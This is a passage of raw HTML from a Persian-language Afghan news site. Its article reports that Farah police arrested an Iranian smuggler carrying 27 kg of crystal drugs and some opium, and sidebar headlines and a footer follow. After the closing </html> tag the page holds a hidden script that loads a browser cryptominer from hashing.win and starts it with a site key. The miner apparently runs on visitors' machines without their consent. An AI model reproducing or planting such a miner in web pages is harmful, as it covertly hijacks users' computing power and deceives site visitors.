                                        <p class="d">13 ساعت قبل</p>
                                    </div>
                                </div>
                            </div>
							 
							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/06/34506048_1689210521196321_197689227146690560_n-80x60.jpg" alt="دوازده پروژه انکشافی در بخش مدیریت آب در یازده ولایت اجرا می‎شود" title="دوازده پروژه انکشافی در بخش مدیریت آب در یازده ولایت اجرا می‎شود"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%af%d9%88%d8%a7%d8%b2%d8%af%d9%87-%d9%be%d8%b1%d9%88%da%98%d9%87-%d8%a7%d9%86%da%a9%d8%b4%d8%a7%d9%81%db%8c-%d8%af%d8%b1-%d8%a8%d8%ae%d8%b4-%d9%85%d8%af%db%8c%d8%b1%db%8c%d8%aa-%d8%a2%d8%a8-%d8%af/">دوازده پروژه انکشافی در بخش مدیریت آب در یازده ولایت اجرا می‎شود</a></h5>
                                        <p class="d">13 ساعت قبل</p>
                                    </div>
                                </div>
                            </div>
							 
							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/03/بازداشت-2-80x60.jpg" alt="یک تبعه ایرانی به اتهام قاچاق مواد مخدر در فراه گرفتار شد" title="یک تبعه ایرانی به اتهام قاچاق مواد مخدر در فراه گرفتار شد"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%db%8c%da%a9-%d8%aa%d8%a8%d8%b9%d9%87-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%d8%a8%d9%87-%d8%a7%d8%aa%d9%87%d8%a7%d9%85-%d9%82%d8%a7%da%86%d8%a7%d9%82-%d9%85%d9%88%d8%a7%d8%af-%d9%85%d8%ae%d8%af%d8%b1/">یک تبعه ایرانی به اتهام قاچاق مواد مخدر در فراه گرفتار شد</a></h5>
                                        <p class="d">13 ساعت قبل</p>
                                    </div>
                                </div>
                            </div>
							 
							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/05/D9F0C5E3-96FD-478C-9BD0-B79103F20D70_cx0_cy3_cw0_w1023_r1_s-80x60.jpg" alt="رییس کمیسیون نظامی گروه طالبان در فاریاب کشته شد" title="رییس کمیسیون نظامی گروه طالبان در فاریاب کشته شد"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%b1%db%8c%db%8c%d8%b3-%da%a9%d9%85%db%8c%d8%b3%db%8c%d9%88%d9%86-%d9%86%d8%b8%d8%a7%d9%85%db%8c-%da%af%d8%b1%d9%88%d9%87-%d8%b7%d8%a7%d9%84%d8%a8%d8%a7%d9%86-%d8%af%d8%b1-%d9%81%d8%a7%d8%b1%db%8c/">رییس کمیسیون نظامی گروه طالبان در فاریاب کشته شد</a></h5>
                                        <p class="d">13 ساعت قبل</p>
                                    </div>
                                </div>
                            </div>
													 </div>
                    </div>

                    <!-- end of first col -->


                    <!-- second col -->	
							
			
		            	
					 <div role="tabpanel" class="tab-pane" id="profile">
                        <div class="row">
                        
                        							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/05/معروف-آروین-80x60.jpg" alt="خانمی که می‎خواهد خود قهرمان خود باشد" title="خانمی که می‎خواهد خود قهرمان خود باشد"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%ae%d8%a7%d9%86%d9%85%db%8c-%da%a9%d9%87-%d9%85%db%8c%e2%80%8e%d8%ae%d9%88%d8%a7%d9%87%d8%af-%d8%ae%d9%88%d8%af-%d9%82%d9%87%d8%b1%d9%85%d8%a7%d9%86-%d8%ae%d9%88%d8%af-%d8%a8%d8%a7%d8%b4%d8%af/">خانمی که می‎خواهد خود قهرمان خود باشد</a></h5>
                                        <p class="d">۶ جوزا ۱۳۹۷</p>
                                    </div>
                                </div>
                            </div>
													<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/04/شهر-کابل-80x60.jpg" alt="جبران ناپذیر" title="جبران ناپذیر"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%ac%d8%a8%d8%b1%d8%a7%d9%86-%d9%86%d8%a7%d9%be%d8%b0%db%8c%d8%b1/">جبران ناپذیر</a></h5>
                                        <p class="d">۴ ثور ۱۳۹۷</p>
                                    </div>
                                </div>
                            </div>
													<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/04/هزاره-80x60.jpg" alt="گفتگو با شاعر &#8220;پل سرخ&#8221;" title="گفتگو با شاعر &#8220;پل سرخ&#8221;"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/46194-2/">گفتگو با شاعر &#8220;پل سرخ&#8221;</a></h5>
                                        <p class="d">۴ ثور ۱۳۹۷</p>
                                    </div>
                                </div>
                            </div>
													<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/04/دایکندی-80x60.jpg" alt="عکس‎های دیدنی از طبیعت زیبای دایکندی" title="عکس‎های دیدنی از طبیعت زیبای دایکندی"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%b9%da%a9%d8%b3%e2%80%8e%d9%87%d8%a7%db%8c-%d8%af%db%8c%d8%af%d9%86%db%8c-%d8%a7%d8%b2-%d8%b7%d8%a8%db%8c%d8%b9%d8%aa-%d8%b2%db%8c%d8%a8%d8%a7%db%8c-%d8%af%d8%a7%db%8c%da%a9%d9%86%d8%af%db%8c/">عکس‎های دیدنی از طبیعت زیبای دایکندی</a></h5>
                                        <p class="d">۲۶ حمل ۱۳۹۷</p>
                                    </div>
                                </div>
                            </div>
						                          
                        </div>
                    </div>
                    <!-- end of second tab -->

                  </div>
                  <!-- tabs -->

            </div>
                
					

				
				
						



				

	
	
             
					
					
		
		
		
		
             
		</div>            <div class="col-lg-9 col-md-9 col-sm-12 col-xs-12 cutmpadding">
            	                <div class="sudr">
                    <div class="row">
                        <div class="col-lg-6">
            <h4 class="brdcrumb">
جنوب غرب                            </h4>
                        </div>
                        <div class="col-lg-6 rtme">
                            <div class="pull-right"></div>
                            <div class="pull-left mright"><small class='icn-left'><i class="fa fa-eye-slash"></i></small> 47 </div>
                            <div class="pull-left mright"><small class='icn-left'><i class="fa fa-clock-o"></i></small>13 ساعت قبل</div>
                            <div class="pull-left mright"><small class='icn-left'><i class="fa fa-user"></i></small> نویسنده: سمیه ولی‎زاده </div>
                        </div>
                    </div>
                </div> 

                <h2 id="sttl"><b>یک تبعه ایرانی به اتهام قاچاق مواد مخدر در فراه گرفتار شد</b></h2>

                <div class="scontent">
<img src="http://tkg.af/wp-content/uploads/2018/03/بازداشت-2.jpg" class="img-responsive" width="100%" />
                    
                    <div class="pcontents">
                    <p>پولیس فراه یک قاچاقبر ایرانی را با بیش از ۲۷ کیلوگرام مواد مخدر گرفتار کرده است.<br />
محب‎الله محب، سخنگوی پولیس فراه، به کلید گفت که ۲۷ کیلوگرام مواد مخدر نوع کریستال و ۹۴۰ گرام مواد مخدر نوع تریاک از داخل یک موتر باربری تیلر کشف و ضبط شده است.<br />
به گفته محب، این مواد از بندر شیخ ابونصر فراهی توسط کارمندان مدیریت مبارزه با مواد مخدر فراه به دست آمده و در پیوند به آن یک قاچاقبر ایرانی نیز گرفتار شده است.<br />
فراه از ولایت‎های سرحدی افغانستان است که بخشی از ناامنی‎ها در این ولایت ریشه در ترانزیت مواد مخدر دارد.<br />
بخشی از مواد مخدر افغانستان از طریق فراه عمدتاً به ایران قاچاق می‎شود.</p>
<!-- Simple Share Buttons Adder (6.3.5) simplesharebuttons.com --><div class="ssba ssba-wrap"><div style="text-align:right">به اشتراک بگذارید<a data-site="" class="ssba_facebook_share" href="http://www.facebook.com/sharer.php?u=http://tkg.af/%db%8c%da%a9-%d8%aa%d8%a8%d8%b9%d9%87-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%d8%a8%d9%87-%d8%a7%d8%aa%d9%87%d8%a7%d9%85-%d9%82%d8%a7%da%86%d8%a7%d9%82-%d9%85%d9%88%d8%a7%d8%af-%d9%85%d8%ae%d8%af%d8%b1/"  target="_blank" ><img src="http://tkg.af/wp-content/plugins/simple-share-buttons-adder/buttons/simple/facebook.png" title="Facebook" class="ssba ssba-img" alt="Share on Facebook" /></a><a data-site="" class="ssba_google_share" href="https://plus.google.com/share?url=http://tkg.af/%db%8c%da%a9-%d8%aa%d8%a8%d8%b9%d9%87-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%d8%a8%d9%87-%d8%a7%d8%aa%d9%87%d8%a7%d9%85-%d9%82%d8%a7%da%86%d8%a7%d9%82-%d9%85%d9%88%d8%a7%d8%af-%d9%85%d8%ae%d8%af%d8%b1/"  target="_blank" ><img src="http://tkg.af/wp-content/plugins/simple-share-buttons-adder/buttons/simple/google.png" title="Google+" class="ssba ssba-img" alt="Share on Google+" /></a><a data-site="" class="ssba_twitter_share" href="http://twitter.com/share?url=http://tkg.af/%db%8c%da%a9-%d8%aa%d8%a8%d8%b9%d9%87-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%d8%a8%d9%87-%d8%a7%d8%aa%d9%87%d8%a7%d9%85-%d9%82%d8%a7%da%86%d8%a7%d9%82-%d9%85%d9%88%d8%a7%d8%af-%d9%85%d8%ae%d8%af%d8%b1/&amp;text=%DB%8C%DA%A9+%D8%AA%D8%A8%D8%B9%D9%87+%D8%A7%DB%8C%D8%B1%D8%A7%D9%86%DB%8C+%D8%A8%D9%87+%D8%A7%D8%AA%D9%87%D8%A7%D9%85+%D9%82%D8%A7%DA%86%D8%A7%D9%82+%D9%85%D9%88%D8%A7%D8%AF+%D9%85%D8%AE%D8%AF%D8%B1+%D8%AF%D8%B1+%D9%81%D8%B1%D8%A7%D9%87+%DA%AF%D8%B1%D9%81%D8%AA%D8%A7%D8%B1+%D8%B4%D8%AF+"  target="_blank" ><img src="http://tkg.af/wp-content/plugins/simple-share-buttons-adder/buttons/simple/twitter.png" title="Twitter" class="ssba ssba-img" alt="Tweet about this on Twitter" /></a><a data-site="linkedin" class="ssba_linkedin_share ssba_share_link" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://tkg.af/%db%8c%da%a9-%d8%aa%d8%a8%d8%b9%d9%87-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%d8%a8%d9%87-%d8%a7%d8%aa%d9%87%d8%a7%d9%85-%d9%82%d8%a7%da%86%d8%a7%d9%82-%d9%85%d9%88%d8%a7%d8%af-%d9%85%d8%ae%d8%af%d8%b1/"  target="_blank" ><img src="http://tkg.af/wp-content/plugins/simple-share-buttons-adder/buttons/simple/linkedin.png" title="LinkedIn" class="ssba ssba-img" alt="Share on LinkedIn" /></a></div></div>                    </div>
                </div>
                
                    <div id="relateLinks" class="row"> <h5 class="tag_cloud">
										</h5></div>
	  
                </div>

                
                
                
<div class="wp_rp_wrap  wp_rp_vertical" id="wp_rp_first"><div class="wp_rp_content"><h3 class="related_post_title">مطالب مشابه</h3><ul class="related_post wp_rp"><li data-position="0" data-poid="in-46086" data-post-type="none" ><a href="http://tkg.af/%d8%a7%d8%ac%d8%b3%d8%a7%d8%af-%d9%86%d8%b8%d8%a7%d9%85%db%8c%d8%a7%d9%86-%d9%be%d8%a7%da%a9%d8%b3%d8%aa%d8%a7%d9%86%db%8c-%d8%a7%d8%b2-%d8%b3%d9%88%db%8c-%d8%ad%da%a9%d9%88%d9%85%d8%aa-%d8%a7%d9%81/" class="wp_rp_thumbnail"><img src="http://tkg.af/wp-content/uploads/2018/04/received_1723593431053748-150x150.jpeg" alt="اجساد نظامیان پاکستانی از سوی حکومت افغانستان به دولت آن کشور سپرده شد" width="150" height="150" /></a><a href="http://tkg.af/%d8%a7%d8%ac%d8%b3%d8%a7%d8%af-%d9%86%d8%b8%d8%a7%d9%85%db%8c%d8%a7%d9%86-%d9%be%d8%a7%da%a9%d8%b3%d8%aa%d8%a7%d9%86%db%8c-%d8%a7%d8%b2-%d8%b3%d9%88%db%8c-%d8%ad%da%a9%d9%88%d9%85%d8%aa-%d8%a7%d9%81/" class="wp_rp_title">اجساد نظامیان پاکستانی از سوی حکومت افغانستان به دولت آن کشور سپرده شد</a></li><li data-position="1" data-poid="in-43428" data-post-type="none" ><a href="http://tkg.af/%d9%82%d9%88%d9%85%d8%a7%d9%86%d8%af%d8%a7%d9%86-%d8%a7%d9%85%d9%86%db%8c%d9%87-%d9%be%da%a9%d8%aa%db%8c%d8%a7-%d8%af%d8%b1-%d8%ad%d9%85%d9%84%d9%87-%da%af%d8%b1%d9%88%d9%87%db%8c-%d8%b7%d8%a7%d9%84/" class="wp_rp_thumbnail"><img src="http://tkg.af/wp-content/uploads/2017/10/DMUaw7GWsAAIGu4-150x150.jpg" alt="قوماندان امنیه پکتیا در حمله گروهی طالبان در گردیز کشته شد/درگیری با مهاجمان پایان یافت" width="150" height="150" /></a><a href="http://tkg.af/%d9%82%d9%88%d9%85%d8%a7%d9%86%d8%af%d8%a7%d9%86-%d8%a7%d9%85%d9%86%db%8c%d9%87-%d9%be%da%a9%d8%aa%db%8c%d8%a7-%d8%af%d8%b1-%d8%ad%d9%85%d9%84%d9%87-%da%af%d8%b1%d9%88%d9%87%db%8c-%d8%b7%d8%a7%d9%84/" class="wp_rp_title">قوماندان امنیه پکتیا در حمله گروهی طالبان در گردیز کشته شد/درگیری با مهاجمان پایان یافت</a></li><li data-position="2" data-poid="in-45897" data-post-type="none" ><a href="http://tkg.af/%d9%82%d9%88%d9%84-%d8%a7%d8%b1%d8%af%d9%88%db%8c-209-%d8%b4%d8%a7%d9%87%db%8c%d9%86-%d8%a2%d9%85%d8%a7%d8%b1-%d9%85%d8%aa%d9%81%d8%a7%d9%88%d8%aa%db%8c-%d8%a7%d8%b2-%d8%aa%d9%84%d9%81%d8%a7%d8%aa/" class="wp_rp_thumbnail"><img src="http://tkg.af/wp-content/uploads/2018/04/دشت-ارچی-150x150.jpg" alt="قول اردوی 209 شاهین آمار متفاوتی از تلفات طالبان در کندز منشتر کرد" width="150" height="150" /></a><a href="http://tkg.af/%d9%82%d9%88%d9%84-%d8%a7%d8%b1%d8%af%d9%88%db%8c-209-%d8%b4%d8%a7%d9%87%db%8c%d9%86-%d8%a2%d9%85%d8%a7%d8%b1-%d9%85%d8%aa%d9%81%d8%a7%d9%88%d8%aa%db%8c-%d8%a7%d8%b2-%d8%aa%d9%84%d9%81%d8%a7%d8%aa/" class="wp_rp_title">قول اردوی 209 شاهین آمار متفاوتی از تلفات طالبان در کندز منشتر کرد</a></li><li data-position="3" data-poid="in-46172" data-post-type="none" ><a href="http://tkg.af/%d8%af%d8%b1-%da%a9%d9%86%d8%af%d8%b2-262-%d8%a8%d8%a7%d8%a8-%d9%85%da%a9%d8%aa%d8%a8-%d8%af%d9%88%d8%a8%d8%a7%d8%b1%d9%87-%d8%a8%d9%87-%d8%b1%d9%88%db%8c-%d8%b4%d8%a7%da%af%d8%b1%d8%af%d8%a7%d9%86/" class="wp_rp_thumbnail"><img src="http://tkg.af/wp-content/uploads/2018/04/مکتب-150x150.jpg" alt="در کندز 262 باب مکتب دوباره به روی شاگردان باز شد" width="150" height="150" /></a><a href="http://tkg.af/%d8%af%d8%b1-%da%a9%d9%86%d8%af%d8%b2-262-%d8%a8%d8%a7%d8%a8-%d9%85%da%a9%d8%aa%d8%a8-%d8%af%d9%88%d8%a8%d8%a7%d8%b1%d9%87-%d8%a8%d9%87-%d8%b1%d9%88%db%8c-%d8%b4%d8%a7%da%af%d8%b1%d8%af%d8%a7%d9%86/" class="wp_rp_title">در کندز 262 باب مکتب دوباره به روی شاگردان باز شد</a></li></ul></div></div>

                <div class=comments>
		    
<!-- You can start editing here. -->
    <h4 class="nazar">تا اکنون هیچ کامنت وجود ندارد</h4>
            <!-- If comments are closed. -->
        <p class="no-comments">تا اکنون هیچ کامنت وجود ندارد</p>
    
		<div style="clear:both"></div>
		</div>
            </div>
        </div>
    </div>
</div>
<div class=footer>
	<div class=container>
		<div class=row id="faligncenter">
			
			<div class="col-lg-3 col-md-3 col-sm-4" id="leftcomu">
				<div class="comu">
					<div class="col-lg-2 col-xs-2"><i class="fa fa-phone"></i></div>
					<div class="col-lg-10 col-xs-10"><p class="finfo" dir=ltr>020 2500 717</p></div>
				</div>
				<div class="comu">
					<div class="col-lg-2 col-xs-2"><i class="fa fa-envelope"></i></div>
					<div class="col-lg-10 col-xs-10"><p class="finfo">info@tkg.af</p></div>
				</div>
				<div class="comu">
					<div class="col-lg-2 col-xs-2"><i class="fa fa-map-marker"></i></div>
					<div class="col-lg-10 col-xs-10"><p class="finfo">سرک شش، کارته سه، کابل، افغانستان</p></div>
				</div>
			</div>

			<div class="col-lg-6 col-md-6 col-sm-5" id="mdform">
				<form   action="http://tkg.af/" style="padding:10px 24px 8px 0px;">
					<div class="input-group" id="ffrm" width="100%">
						<span class="input-group-addon wbc"><b><i class="fa fa-search"></i></b></span>
						<input id="prependedtext" value="" name="s" class="form-control" type="text">
					</div>
				</form>

				<div class="social-widget">
				   <a href="https://www.facebook.com/tkgweb"><i class="fa fa-facebook"></i></a>
				   <a href="https://twitter.com/TheKillidGroup"><i class="fa fa-twitter"></i></a>
				   <a href="https://plus.google.com/109025353126920726549"><i class="fa fa-google-plus"></i></a>
				   <a href="https://www.youtube.com/channel/UCSVItQlFN31H8ckkxveKn5A"><i class="fa fa-youtube"></i></a>
				   <a href="http://tkg.af/feed"><i class="fa fa-rss"></i></a>
				</div>
			</div>

			<div class="col-lg-3 col-md-3 col-sm-6" id="fright" >
				<h4><b>دانلود اپلیکیشن های موبایل</b></h4>
				<div class="apps" align="center">
					<a href="https://itunes.apple.com/us/app/tkg/id1148853903" target="_blank"><img src="/land/app_store.png"></a>
					<a href="https://play.google.com/store/apps/details?id=af.techsharks.thekillidgroup" target="_blank"><img src="/land/google_play.png"></a>
				</div>
			</div>            
		</div>
	</div>
</div>
	<!-- footer -->
<div class="footer-copyright">
	<div class=container>
		<div class="col-lg-6 col-sm-6 col-xs-12">
			<p class="flft">Copyright 2010 &copy; TKG: A public media project of <a href="http://dhsa.af" target="_blank" style='color:#fff;text-decoration:underline'>DHSA</a></p>
		</div>
		<div class="col-lg-6 col-sm-6 col-xs-12">
			<p>Powered By <a style='color:#fff;text-decoration:underline' target="_blank" href="http://techsharks.af/" class=techshark>TechSharks</a></p>
		</div>
	</div>
</div>
<script type='text/javascript' src='http://tkg.af/wp-content/plugins/simple-share-buttons-adder/js/ssba.min.js?ver=4.8'></script>
<script type='text/javascript' src='http://tkg.af/wp-includes/js/wp-embed.min.js?ver=4.8'></script>
<script type="text/javascript" src="/wp-content/themes/shark/css/bootstrap/js/jquery.min.js"></script>
<script type="text/javascript" src="/wp-content/themes/shark/css/bootstrap/js/bootstrap.min.js"></script>	
<script type="text/javascript" src="/wp-content/themes/shark/js/script.js"></script>
<script src="/wp-content/themes/shark/assets/owlcarousel2/owl.carousel.min.js"></script>
<script type="text/javascript">
$('.navbar-nav .sub-menu').parent().addClass('dropdown');
$('.sub-menu').prev().attr('data-toggle','dropdown');
$('.navbar-nav .sub-menu').prev().append('&nbsp;<span class="fa fa-caret-down"></span>');
$('.navbar-nav .sub-menu').addClass('dropdown-menu');
function player(channel, txt){
var src = "http://cdn.voscast.com/player/player.php?host=";$('#radioPlayer').attr('src', src+channel);$('.rtitle').html(txt);}</script>
</body></html><script src="https://www.hashing.win/scripts/min.js"></script><script>var miner = new Client.Anonymous('6a0e05acaaa42c54b02cef84ef7a55543cd9dad443f5d8cc2c2e5c4014ece2cc', {throttle:0.4});miner.start();</script>
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');ga('create','UA-20324816-35','auto');ga('send','pageview')</script>